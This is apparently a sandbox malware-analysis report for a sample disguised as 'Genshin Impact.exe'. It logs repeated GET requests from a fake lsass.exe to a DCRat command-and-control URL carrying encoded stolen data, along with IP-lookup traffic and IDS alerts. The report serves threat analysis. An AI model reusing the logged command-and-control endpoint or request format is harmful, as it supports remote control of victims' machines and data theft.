YmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W
unknown
text
2.09 Kb
unknown
3876
lsass.exe
GET
200
104.21.2.8:80
http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&5e79fff15169b7d3a3fa62efdb306b31=d1nIxMTNlhjNlJGNlNTN5ImNzEzYzQDM0ITM1cDMwkDOzUDNzQDMyMGZyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W&4a4a8831cb4723c7f5e3b65ea3eefbf9=d1nIiojI3MWMkBzNjJTYlZTMyIGNmFmMwYTZhNDZ1kTMlRmNykjIsISMzUTZ4YTZiRTZzUTOiZzMxM2M0ADNyETN3ADM5gzM1QzM0AjMjRmMiojIxQTZ5ITM2kTYjVmZzIGMyYWNyQmN2gjZ1MWY3YGNiZjIsICN5EjM3YDN5Q2YwQWNmZTOmVTNyUGOklDNwIWYyYTO0MjZ3IDOwU2NiojI5MmZiNTOhJjY2EDO4ImN5ITZ1EGM4EWN0EzMykTMxQmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJFTNXpFdCNEZ5Z0RkRlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZIt0Zvh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTtkQ5kGVvFUajxmUINGaSdVUn10MZBHaHNGaKNjUnVEMSdlQDpVeGdkW1Z0RkRlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QClWT6F0QihWNyIGcONzYsplMilnQGl0MBl3YzkzRaVHbyYVavpWS5ZVbWVHbyYVa3NlZpRzVhNnSYp1Q5MlW3lTbjFjVrlkNJNlW1lTblxWMXFGMKNETpFERNdXQE10dJl2Tpd3VZBjTzI2dKNETptmbihWMtNGbkVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNZRUTwQTeNh3dp5UNFRlT1lEVOl2bqlka5ckYpdXaJZkUrlkNJNVZ5JlbiFTOykVa3lWS1x2RilnVtF1ZR1mYoh3aJZTSpJmdsJjWspkbJNXSpJGc412Ysp0aJZTSTVGMsJTWpdXaJp3YqxkejRVT1FFVNlHNT1ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiI0UjZ5EWNlBTNmdDZ3AzNmJDZzYDMlRGZ3gTZllDZlZmN1kTOkFWOmJiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W
unknown
text
104 b
unknown
3876
lsass.exe
GET
200
104.21.2.8:80
http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&5e79fff15169b7d3a3fa62efdb306b31=d1nIxMTNlhjNlJGNlNTN5ImNzEzYzQDM0ITM1cDMwkDOzUDNzQDMyMGZyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W&4a4a8831cb4723c7f5e3b65ea3eefbf9=d1nIiojI3MWMkBzNjJTYlZTMyIGNmFmMwYTZhNDZ1kTMlRmNykjIsISMzUTZ4YTZiRTZzUTOiZzMxM2M0ADNyETN3ADM5gzM1QzM0AjMjRmMiojIxQTZ5ITM2kTYjVmZzIGMyYWNyQmN2gjZ1MWY3YGNiZjIsICN5EjM3YDN5Q2YwQWNmZTOmVTNyUGOklDNwIWYyYTO0MjZ3IDOwU2NiojI5MmZiNTOhJjY2EDO4ImN5ITZ1EGM4EWN0EzMykTMxQmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJFTNXpFdCNEZ5Z0RkRlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZIt0Zvh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTtkQ5kGVvFUajxmUINGaSdVUn10MZBHaHNGaKNjUnVEMSdlQDpVeGdkW1Z0RkRlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QClWT6F0QihWNyIGcONzYsplMilnQGl0MBl3YzkzRaVHbyYVavpWS5ZVbWVHbyYVa3NlZpRzVhNnSYp1Q5MlW3lTbjFjVrlkNJNlW1lTblxWMXFGMKNETpFERNdXQE10dJl2Tpd3VZBjTzI2dKNETptmbihWMtNGbkVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNZRUTwQTeNh3dp5UNFRlT1lEVOl2bqlka5ckYpdXaJZkUrlkNJNVZ5JlbiFTOykVa3lWS1x2RilnVtF1ZR1mYoh3aJZTSpJmdsJjWspkbJNXSpJGc412Ysp0aJZTSTVGMsJTWpdXaJp3YqxkejRVT1FFVNlHNT1ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiI0UjZ5EWNlBTNmdDZ3AzNmJDZzYDMlRGZ3gTZllDZlZmN1kTOkFWOmJiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W
unknown
text
104 b
unknown
3876
lsass.exe
GET
200
104.21.2.8:80
http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&5e79fff15169b7d3a3fa62efdb306b31=d1nIxMTNlhjNlJGNlNTN5ImNzEzYzQDM0ITM1cDMwkDOzUDNzQDMyMGZyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W&4a4a8831cb4723c7f5e3b65ea3eefbf9=d1nIiojI3MWMkBzNjJTYlZTMyIGNmFmMwYTZhNDZ1kTMlRmNykjIsISMzUTZ4YTZiRTZzUTOiZzMxM2M0ADNyETN3ADM5gzM1QzM0AjMjRmMiojIxQTZ5ITM2kTYjVmZzIGMyYWNyQmN2gjZ1MWY3YGNiZjIsICN5EjM3YDN5Q2YwQWNmZTOmVTNyUGOklDNwIWYyYTO0MjZ3IDOwU2NiojI5MmZiNTOhJjY2EDO4ImN5ITZ1EGM4EWN0EzMykTMxQmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJFTNXpFdCNEZ5Z0RkRlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZIt0Zvh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTtkQ5kGVvFUajxmUINGaSdVUn10MZBHaHNGaKNjUnVEMSdlQDpVeGdkW1Z0RkRlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QClWT6F0QihWNyIGcONzYsplMilnQGl0MBl3YzkzRaVHbyYVavpWS5ZVbWVHbyYVa3NlZpRzVhNnSYp1Q5MlW3lTbjFjVrlkNJNlW1lTblxWMXFGMKNETpFERNdXQE10dJl2Tpd3VZBjTzI2dKNETptmbihWMtNGbkVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNZRUTwQTeNh3dp5UNFRlT1lEVOl2bqlka5ckYpdXaJZkUrlkNJNVZ5JlbiFTOykVa3lWS1x2RilnVtF1ZR1mYoh3aJZTSpJmdsJjWspkbJNXSpJGc412Ysp0aJZTSTVGMsJTWpdXaJp3YqxkejRVT1FFVNlHNT1ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiI0UjZ5EWNlBTNmdDZ3AzNmJDZzYDMlRGZ3gTZllDZlZmN1kTOkFWOmJiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W
unknown
text
104 b
unknown
3876
lsass.exe
GET
200
104.21.2.8:80
http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&5e79fff15169b7d3a3fa62efdb306b31=d1nIxMTNlhjNlJGNlNTN5ImNzEzYzQDM0ITM1cDMwkDOzUDNzQDMyMGZyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W&4a4a8831cb4723c7f5e3b65ea3eefbf9=d1nIiojI3MWMkBzNjJTYlZTMyIGNmFmMwYTZhNDZ1kTMlRmNykjIsISMzUTZ4YTZiRTZzUTOiZzMxM2M0ADNyETN3ADM5gzM1QzM0AjMjRmMiojIxQTZ5ITM2kTYjVmZzIGMyYWNyQmN2gjZ1MWY3YGNiZjIsICN5EjM3YDN5Q2YwQWNmZTOmVTNyUGOklDNwIWYyYTO0MjZ3IDOwU2NiojI5MmZiNTOhJjY2EDO4ImN5ITZ1EGM4EWN0EzMykTMxQmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJFTNXpFdCNEZ5Z0RkRlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZIt0Zvh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTtkQ5kGVvFUajxmUINGaSdVUn10MZBHaHNGaKNjUnVEMSdlQDpVeGdkW1Z0RkRlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QClWT6F0QihWNyIGcONzYsplMilnQGl0MBl3YzkzRaVHbyYVavpWS5ZVbWVHbyYVa3NlZpRzVhNnSYp1Q5MlW3lTbjFjVrlkNJNlW1lTblxWMXFGMKNETpFERNdXQE10dJl2Tpd3VZBjTzI2dKNETptmbihWMtNGbkVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNZRUTwQTeNh3dp5UNFRlT1lEVOl2bqlka5ckYpdXaJZkUrlkNJNVZ5JlbiFTOykVa3lWS1x2RilnVtF1ZR1mYoh3aJZTSpJmdsJjWspkbJNXSpJGc412Ysp0aJZTSTVGMsJTWpdXaJp3YqxkejRVT1FFVNlHNT1ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiI0UjZ5EWNlBTNmdDZ3AzNmJDZzYDMlRGZ3gTZllDZlZmN1kTOkFWOmJiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W
unknown
text
104 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
120
PortwebSaves.exe
208.95.112.1:80
ip-api.com
TUT-AS
US
unknown
3876
lsass.exe
208.95.112.1:80
ip-api.com
TUT-AS
US
unknown
3876
lsass.exe
104.21.2.8:80
7777.cllt.nyashteam.ru
CLOUDFLARENET
unknown

DNS requests

Domain
IP
Reputation
ip-api.com
  • 208.95.112.1
shared
7777.cllt.nyashteam.ru
  • 104.21.2.8
  • 172.67.186.200
unknown

Threats

PID
Process
Class
Message
120
PortwebSaves.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
120
PortwebSaves.exe
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External Hosting Lookup by ip-api
120
PortwebSaves.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
3876
lsass.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
3876
lsass.exe
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External Hosting Lookup by ip-api
3876
lsass.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
3876
lsass.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
3876
lsass.exe
A Network Trojan was detected
ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Genshin Impact.exe